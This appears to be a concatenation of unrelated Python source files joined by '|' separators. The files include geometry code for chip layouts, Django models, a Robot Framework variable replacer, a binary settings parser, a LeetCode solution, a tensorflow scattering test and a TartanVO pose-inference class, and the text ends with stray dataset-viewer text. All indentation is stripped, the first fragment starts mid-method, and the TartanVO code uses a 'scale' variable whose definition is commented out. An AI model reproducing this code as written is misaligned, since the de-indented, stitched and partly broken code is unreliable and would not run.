# Process the endpoints
for k, v in self.endpoints.items():
p1 = list(p1)
p2 = list(p2)
if p1[0] == p2[0]:
p1[0] += 1E-20
if p1[1] == p2[1]:
p1[1] += 1E-20
# y = ax + c : mirror line
a = (p2[1] - p1[1]) / (p2[0] - p1[0])
c = p1[1] - a * p1[0]
d = (v[0] + (v[1] - c)*a) / (1 + a**2)
v2x = 2*d - v[0]
v2y = 2*d*a - v[1] + 2*c
self.endpoints[k] = (v2x, v2y)
# Ripple through all connected shapes
for i in self.prev:
if self.prev[i] not in signal_from and self.prev:
signal_from.append(self.prev[i])
self.prev[i].mirror(p1, p2, signal_from = signal_from)
for i in self.next:
if self.next[i] not in signal_from and self.next:
signal_from.append(self.next[i])
self.next[i].mirror(p1, p2, signal_from = signal_from)
return self
#=================
# Heal connection \\
#=========================================================================
# When connection endpoints, there is always a little space that is not ||
# overlapped. This function will fill this overlap. ||
# ||
# Arguments: endpoint : (x, y) center of healer ||
# (optional) npoints : number of points to use for boundary ||
#=========================================================================
def heal(self, endpoint, npoints = 100, r = 'auto', layer = None, datatype = None):
if type(r) == str and r == 'auto':
r = self.endpoint_dims[endpoint] / 2
healer = gtools.heal.circle(r, self.endpoints[endpoint], npoints = npoints, layer = layer if layer != None else self.getlayer(), datatype = datatype if datatype != None else self.structure.datatypes[0])
self.prev['HEAL_' + endpoint] = healer
self.compound += [healer]
return self
#===================
# Connect structure \\
#=========================================================================
# Arguments: ep_self : reference to A, B, C, etc. ||
# name of endpoint of this structure ||
# to : GDStructure class input to which to connect ||
# ep_to : endpoint to which to connect to ||
# offset : (x, y) offset from target endpoints ||
# obj_link: use Python object reference for linked list ||
# entry rather than endpoint key ||
#=========================================================================
def connect(self, ep_self, to, ep_to, offset = (0, 0), obj_link = False, rotate = True):
# Rotate to correct orientation
if self.endpoint_directions != None and to.endpoint_directions != None and self.endpoint_directions and to.endpoint_directions and rotate:
self.rotate((to.endpoint_directions[ep_to] - self.endpoint_directions[ep_self] - np.pi) % (2 * np.pi))
# Move to connect endpoints
delta = tuple(map(sub, to.endpoints[ep_to], self.endpoints[ep_self]))
delta = tuple(map(add, delta, offset))
self.mov(delta)
# Update linked list
if not obj_link:
to.next[ep_to] = self
self.prev[ep_self] = to
else:
to.next[self] = self
self.prev[to] = to
return self
#======================
# Disconnect structure \\
#=========================================================================
# Only removes the references in the linked lists ||
#=========================================================================
def disconnect(self):
for e in self.endpoints:
if e in self.next:
for ne in self.next[e].endpoints:
if ne in self.next[e].prev and self.next[e].prev[ne] == self:
del self.next[e].prev[ne]
del self.next[e]
if e in self.prev:
for pe in self.prev[e].endpoints:
if pe in self.prev[e].next and self.prev[e].next[pe] == self:
del self.prev[e].next[pe]
del self.prev[e]
return self
# Aliases
rot = rotate
mov = translate
con = connect
dis = disconnect
|
# AUTOGENERATED BY NBDEV! DO NOT EDIT!
__all__ = ["index", "modules", "custom_doc_links", "git_url"]
index = {"Preprocess": "00_preprocess.ipynb",
"get_freq": "01_tfidf.ipynb",
"form_matrix": "01_tfidf.ipynb",
"get_query_vec": "01_tfidf.ipynb",
"get_cos_sim": "01_tfidf.ipynb"}
modules = ["preprocess.py",
"tfidf.py",
"None.py"]
doc_url = "https://Sylvia9628.github.io/nbdev_testing/"
git_url = "https://github.com/Sylvia9628/nbdev_testing/tree/master/"
def custom_doc_links(name): return None
|
from django.db import models
class RawDialog(models.Model):
id = models.AutoField(primary_key=True)
content_text = models.CharField(blank=False, null=False, max_length=500)
create_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'raw_dialogs'
class CensoredDialog(models.Model):
id = models.AutoField(primary_key=True)
raw_dialog = models.ForeignKey(RawDialog, db_column='raw_dialog_id', on_delete=models.CASCADE, null=False, related_name='censored_dialogs')
content_text = models.CharField(blank=False, null=False, max_length=500)
create_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'censored_dialogs'
|
# Copyright 2008-2015 Nokia Solutions and Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robotide.lib.robot.errors import DataError, VariableError
from robotide.lib.robot.output import LOGGER
from robotide.lib.robot.utils import escape, unescape, unic, is_string
from .splitter import VariableSplitter
class VariableReplacer(object):
def __init__(self, variables):
self._variables = variables
def replace_list(self, items, replace_until=None):
"""Replaces variables from a list of items.
If an item in a list is a @{list} variable its value is returned.
Possible variables from other items are replaced using 'replace_scalar'.
Result is always a list.
'replace_until' can be used to limit replacing arguments to certain
index from the beginning. Used with Run Keyword variants that only
want to resolve some of the arguments in the beginning and pass others
to called keywords unmodified.
"""
items = list(items or [])
if replace_until is not None:
return self._replace_list_until(items, replace_until)
return list(self._replace_list(items))
def _replace_list_until(self, items, replace_until):
# @{list} variables can contain more or less arguments than needed.
# Therefore we need to go through items one by one, and escape possible
# extra items we got.
replaced = []
while len(replaced) < replace_until and items:
replaced.extend(self._replace_list([items.pop(0)]))
if len(replaced) > replace_until:
replaced[replace_until:] = [escape(item)
for item in replaced[replace_until:]]
return replaced + items
def _replace_list(self, items):
for item in items:
if self._cannot_have_variables(item):
yield unescape(item)
else:
splitter = VariableSplitter(item)
value = self._replace_scalar(item, splitter)
if splitter.is_list_variable():
for v in value:
yield v
else:
yield value
def replace_scalar(self, item):
"""Replaces variables from a scalar item.
If the item is not a string it is returned as is. If it is a ${scalar}
variable its value is returned. Otherwise variables are replaced with
'replace_string'. Result may be any object.
"""
if self._cannot_have_variables(item):
return unescape(item)
return self._replace_scalar(item)
def _replace_scalar(self, item, splitter=None):
if not splitter:
splitter = VariableSplitter(item)
if not splitter.identifier:
return unescape(item)
if splitter.is_variable():
return self._get_variable(splitter)
return self._replace_string(item, splitter)
def _cannot_have_variables(self, item):
return not (is_string(item) and '{' in item)
def replace_string(self, string, ignore_errors=False):
"""Replaces variables from a string. Result is always a string."""
if not is_string(string):
return unic(string)
if self._cannot_have_variables(string):
return unescape(string)
return self._replace_string(string, ignore_errors=ignore_errors)
def _replace_string(self, string, splitter=None, ignore_errors=False):
if not splitter:
splitter = VariableSplitter(string)
return ''.join(self._yield_replaced(string, splitter, ignore_errors))
def _yield_replaced(self, string, splitter, ignore_errors=False):
while splitter.identifier:
yield unescape(string[:splitter.start])
try:
value = self._get_variable(splitter)
except DataError:
if not ignore_errors:
raise
value = string[splitter.start:splitter.end]
yield unic(value)
string = string[splitter.end:]
splitter = VariableSplitter(string)
yield unescape(string)
def _get_variable(self, splitter):
if splitter.identifier not in '$@&%':
return self._get_reserved_variable(splitter)
if splitter.index is None:
return self._get_normal_variable(splitter)
if splitter.identifier == '@':
return self._get_list_variable_item(splitter)
return self._get_dict_variable_item(splitter)
def _get_reserved_variable(self, splitter):
value = splitter.get_replaced_variable(self)
LOGGER.warn("Syntax '%s' is reserved for future use. Please "
"escape it like '\\%s'." % (value, value))
return value
def _get_normal_variable(self, splitter):
name = splitter.get_replaced_variable(self)
return self._variables[name]
def _get_list_variable_item(self, splitter):
name = splitter.get_replaced_variable(self)
variable = self._variables[name]
index = self.replace_string(splitter.index)
try:
index = int(index)
except ValueError:
raise VariableError("List variable '%s' used with invalid index '%s'."
% (name, index))
try:
return variable[index]
except IndexError:
raise VariableError("List variable '%s' has no item in index %d."
% (name, index))
def _get_dict_variable_item(self, splitter):
name = splitter.get_replaced_variable(self)
variable = self._variables[name]
key = self.replace_scalar(splitter.index)
try:
return variable[key]
except KeyError:
raise VariableError("Dictionary variable '%s' has no key '%s'."
% (name, key))
except TypeError as err:
raise VariableError("Dictionary variable '%s' used with invalid key: %s"
% (name, err))
|
from django.apps import AppConfig as DjangoAppConfig
class AppConfig(DjangoAppConfig):
name = "unplugged.services.admin"
verbose_name = "Admin Service"
label = "services_admin"
def ready(self):
from .handler import AdminService # NOQA
|
import os,sys
import checker
import json
username = sys.argv[1]
# username = input()
account = checker.check(username)
json_string = json.dumps(account)
print(json_string)
try:
os.chdir(os.getcwd()+'/Python_Scripts/result/')
except:
pass
with open("userpresent.json","w") as f:
json.dump(account,f)
|
import threading, wx, os, wx.lib.agw.aui as aui
from sciapp import Source
def parse(cont):
ls = cont.split('\n')
workflow = {'title':ls[0], 'chapter':[]}
for line in ls[2:]:
line = line.strip()
if line.startswith('## '):
chapter = {'title':line[3:], 'section':[]}
workflow['chapter'].append(chapter)
elif line[1:3] == '. ':
section = {'title':line[3:]}
else:
section['hint'] = line
chapter['section'].append(section)
return workflow
class WorkFlow:
def __init__(self, title, cont):
self.title = title
self.workflow = parse(cont)
self.cont = cont
def __call__(self):
return self
def start(self, para=None, callafter=None):
pan = WorkFlowPanel(IPy.curapp)
pan.load(self.cont, self.workflow)
info = aui.AuiPaneInfo(). DestroyOnClose(True). Left(). Caption(self.title) .PinButton( True ) \
.Resizable().FloatingSize( wx.DefaultSize ).Dockable(IPy.uimode()=='ipy').Layer( 5 )
if IPy.uimode()=='ipy': info.Dock().Top()
if IPy.uimode()=='ij': info.Float()
IPy.curapp.auimgr.AddPane(pan, info)
IPy.curapp.Layout()
IPy.curapp.auimgr.Update()
def show_wf(data, title):
wx.CallAfter(WorkFlow(title, data).start)
# ViewerManager.add('wf', show_wf)
def read_wf(path):
f = open(path, encoding='utf-8')
cont = f.read()
f.close()
print(cont)
return cont
Source.manager('reader').add(name='wf', obj=read_wf, tag='wf') |
#!/usr/bin/env python3
from __future__ import print_function
import os
import struct
import sys
import collections
CFG_TYPE_STR = 0x01
CFG_TYPE_U8 = 0x02
CFG_TYPE_U32 = 0x03
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def printStringSetting(name, value):
value_str = value.decode('utf-8').strip('\x00')
print('%s = str!"%s"' % (name, value_str))
def printU8Setting(name, value):
print('%s = u8!0x%X' % (name, value[0]))
def printU32Setting(name, value):
value_u32 = struct.unpack('<I', value)[0]
print('%s = u32!0x%X' % (name, value_u32))
def parseSystemSettings(path, size):
# Create a dictionary to easily handle different config entry types.
cfg_type_dict = {
CFG_TYPE_STR: printStringSetting,
CFG_TYPE_U8: printU8Setting,
CFG_TYPE_U32: printU32Setting
}
# Used to hold parsed configuration entries.
cfg = {}
# Open settings file.
try:
file = open(path, "rb")
except:
eprint('Failed to open file!')
return
# Double check settings file size by reading the first four bytes.
settings_size = struct.unpack('<I', file.read(4))[0]
if settings_size != size:
eprint('File size in header doesn\'t match actual file size!')
file.close()
return
offset = 4
error = False
# Parse settings file.
while offset < size:
entry_offset = offset
# Safety check.
if (offset + 4) > size:
eprint('Invalid name size field length for config entry at offset 0x%X (0x%X byte[s] left).' % (entry_offset, size - offset))
error = True
break
# Get name size.
name_size = struct.unpack('<I', file.read(4))[0]
offset += 4
# Safety check.
if (not name_size) or ((offset + name_size + 5) > size):
eprint('Invalid name/type/value size field length for config entry at offset 0x%X (0x%X byte[s] left, 0x%X-byte long name).' % (entry_offset, size - offset, name_size))
error = True
break
# Get actual name and stringify it. It's actual length should be a byte less than the retrieved name size (which holds a NULL terminator).
name = file.read(name_size).decode('utf-8').strip('\x00')
if len(name) != (name_size - 1):
eprint('Invalid stringified name length for config entry at offset 0x%X.' % (entry_offset))
error = True
break
offset += name_size
# An exclamation mark is always used to divide the config entry owner and the actual config entry name.
name_start = name.find('!')
if (name_start < 0):
eprint('Name for config entry at offset 0x%X doesn\'t hold an owner.' % (entry_offset))
error = True
break
# Slice the read string to get the actual owner and name strings.
owner = name[:name_start]
name = name[name_start+1:]
# Get config entry type and config value size.
(type, value_size) = struct.unpack('<BI', file.read(5))
offset += 5
# Safety check.
if (offset + value_size) > size:
eprint('Invalid value field length for config entry at offset 0x%X (0x%X byte[s] left, 0x%X-byte long value).' % (entry_offset, size - offset, value_size))
error = True
break
# Get config value.
value = file.read(value_size)
offset += value_size
# Safety check.
if ((type == CFG_TYPE_U8) and (len(value) != 1)) or ((type == CFG_TYPE_U32) and (len(value) != 4)):
eprint('Value size doesn\'t match entry type for config entry at offset 0x%X.' % (entry_offset))
error = True
break
# Get dictionary for this owner.
owner_cfg = cfg.get(owner, {})
# Update config entry.
owner_cfg.update({name: (entry_offset, type, value)})
# Update owner dictionary.
cfg.update({owner: owner_cfg})
file.close()
if error == True:
return
# Print ordered config entries.
ordered_cfg = collections.OrderedDict(sorted(cfg.items()))
for (owner, owner_cfg) in ordered_cfg.items():
print('[%s]' % (owner))
ordered_owner_cfg = collections.OrderedDict(sorted(owner_cfg.items()))
for (name, properties) in ordered_owner_cfg.items():
(entry_offset, type, value) = properties
# Use our dictionary to retrieve a proper print function for the current config entry type.
print_func = cfg_type_dict.get(type, None)
if not print_func:
eprint('Unknown config value type for entry at offset 0x%X (0x%02X).' % (entry_offset, type))
return
print_func(name, value)
print()
def main():
# Check number of provided arguments.
if len(sys.argv) < 2:
eprint('Provide a path to a system settings file!')
return
# Resolve the provided path and check if it points to an existing file.
path = os.path.abspath(os.path.expanduser(os.path.expandvars(sys.argv[1])))
if (os.path.exists(path) == False) or (os.path.isdir(path) == True):
eprint('The provided path doesn\'t exist or points to a directory!')
return
# Get settings file size.
size = os.path.getsize(path)
if size <= 4:
eprint('Invalid file size.')
return
# Parse settings file.
parseSystemSettings(path, size)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
eprint('\nScript interrupted.')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
#
# @lc app=leetcode id=821 lang=python3
#
# [821] Shortest Distance to a Character
#
# https://leetcode.com/problems/shortest-distance-to-a-character/description/
#
# algorithms
# Easy (64.71%)
# Likes: 844
# Dislikes: 69
# Total Accepted: 54.4K
# Total Submissions: 83K
# Testcase Example: '"loveleetcode"\n"e"'
#
# Given a string S and a character C, return an array of integers representing
# the shortest distance from the character C in the string.
#
# Example 1:
#
#
# Input: S = "loveleetcode", C = 'e'
# Output: [3, 2, 1, 0, 1, 0, 0, 1, 2, 2, 1, 0]
#
#
#
#
# Note:
#
#
# S string length is in [1, 10000].
# C is a single character, and guaranteed to be in string S.
# All letters in S and C are lowercase.
#
#
#
# @lc code=start
class Solution:
def shortestToChar(self, S: str, C: str) -> List[int]:
target = []
n = len(S)
ans = []
for i,c in enumerate(S):
if C==c:
target.append(i)
for i in range(n):
ans.append(min([abs(i-a) for a in target]))
return ans
# @lc code=end
|
import argparse
import logging
from ccoin.p2p_network import BasePeer
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("node_id", help='Id of the node in the given peers dict.')
# parser.add_argument("port", help='Listening port.')
args = parser.parse_args()
node_id = args.node_id
# port autodiscovery
port = 0 # int(args.port)
node = BasePeer(node_id)
node.run_p2p(port)
if __name__ == "__main__":
main() |
import sys
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
PY26 = sys.version_info[0] == 2 and sys.version_info[1] == 6
if PY3:
from io import BytesIO as StringIO
from urllib.parse import urlparse
else:
from urlparse import urlparse # noqa
from cStringIO import StringIO # noqa
if PY26:
from unittest2 import TestCase
else:
from unittest import TestCase
if PY3:
def to_bytes(string):
return bytes(string, 'utf-8')
else:
to_bytes = lambda s: s
|
import os
import io
import tensorflow as tf
from kymatio.scattering2d import Scattering2D
import torch
import numpy as np
import pytest
from kymatio.backend.fake_backend import backend as fake_backend
class TestScattering2DTensorflow:
def reorder_coefficients_from_interleaved(self, J, L):
# helper function to obtain positions of order0, order1, order2 from interleaved
order0, order1, order2 = [], [], []
n_order0, n_order1, n_order2 = 1, J * L, L ** 2 * J * (J - 1) // 2
n = 0
order0.append(n)
for j1 in range(J):
for l1 in range(L):
n += 1
order1.append(n)
for j2 in range(j1 + 1, J):
for l2 in range(L):
n += 1
order2.append(n)
assert len(order0) == n_order0
assert len(order1) == n_order1
assert len(order2) == n_order2
return order0, order1, order2
def test_Scattering2D(self):
test_data_dir = os.path.dirname(__file__)
data = None
with open(os.path.join(test_data_dir, 'test_data_2d.pt'), 'rb') as f:
buffer = io.BytesIO(f.read())
data = torch.load(buffer)
x = data['x'].numpy()
S = data['Sx'].numpy()
J = data['J']
# we need to reorder S from interleaved (how it's saved) to o0, o1, o2
# (which is how it's now computed)
o0, o1, o2 = self.reorder_coefficients_from_interleaved(J, 8)
reorder = np.concatenate((o0, o1, o2))
S = S[..., reorder, :, :]
pre_pad = data['pre_pad']
M, N = x.shape[2:]
# Tf
scattering = Scattering2D(J, shape=(M, N), pre_pad=pre_pad, frontend='tensorflow')
Sg = scattering(x)
assert np.allclose(Sg, S)
def test_inputs(self):
with pytest.raises(RuntimeError) as ve:
scattering = Scattering2D(2, shape=(10, 10), frontend='tensorflow', backend=fake_backend)
assert 'not supported' in ve.value.args[0]
with pytest.raises(RuntimeError) as ve:
scattering = Scattering2D(10, shape=(10, 10), frontend='tensorflow')
assert 'smallest dimension' in ve.value.args[0] |
# Software License Agreement (BSD License)
#
# Copyright (c) 2020, Wenshan Wang, Yaoyu Hu, CMU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of CMU nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import torch
import numpy as np
import time
np.set_printoptions(precision=4, suppress=True, threshold=10000)
from Network.VONet import VONet
class TartanVO(object):
def __init__(self, model_name):
# import ipdb;ipdb.set_trace()
self.vonet = VONet()
# load the whole model
if model_name.endswith('.pkl'):
modelname = 'models/' + model_name
self.load_model(self.vonet, modelname)
self.vonet.cuda()
self.test_count = 0
self.pose_std = np.array([ 0.13, 0.13, 0.13, 0.013 , 0.013, 0.013], dtype=np.float32) # the output scale factor
self.flow_norm = 20 # scale factor for flow
def load_model(self, model, modelname):
preTrainDict = torch.load(modelname)
model_dict = model.state_dict()
preTrainDictTemp = {k:v for k,v in preTrainDict.items() if k in model_dict}
if( 0 == len(preTrainDictTemp) ):
print("Does not find any module to load. Try DataParallel version.")
for k, v in preTrainDict.items():
kk = k[7:]
if ( kk in model_dict ):
preTrainDictTemp[kk] = v
if ( 0 == len(preTrainDictTemp) ):
raise Exception("Could not load model from %s." % (modelname), "load_model")
model_dict.update(preTrainDictTemp)
model.load_state_dict(model_dict)
print('Model loaded...')
return model
def test_batch(self, sample):
self.test_count += 1
# import ipdb;ipdb.set_trace()
img0 = sample['img1'].cuda()
img1 = sample['img2'].cuda()
intrinsic = sample['intrinsic'].cuda()
inputs = [img0, img1, intrinsic]
self.vonet.eval()
with torch.no_grad():
starttime = time.time()
flow, pose = self.vonet(inputs)
inferencetime = time.time()-starttime
# import ipdb;ipdb.set_trace()
posenp = pose.data.cpu().numpy()
posenp = posenp * self.pose_std # The output is normalized during training, now scale it back
flownp = flow.data.cpu().numpy()
flownp = flownp * self.flow_norm
# calculate scale from GT posefile
if 'motion' in sample:
motions_gt = sample['motion']
#scale = np.linalg.norm(motions_gt[:,:3], axis=1)
trans_est = posenp[:,:3]
trans_est = trans_est/np.linalg.norm(trans_est,axis=1).reshape(-1,1)*scale.reshape(-1,1)
posenp[:,:3] = trans_est
else:
print(' scale is not given, using 1 as the default scale value..')
print("{} Pose inference using {}s: \n{}".format(self.test_count, inferencetime, posenp))
return posenp, flownp
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.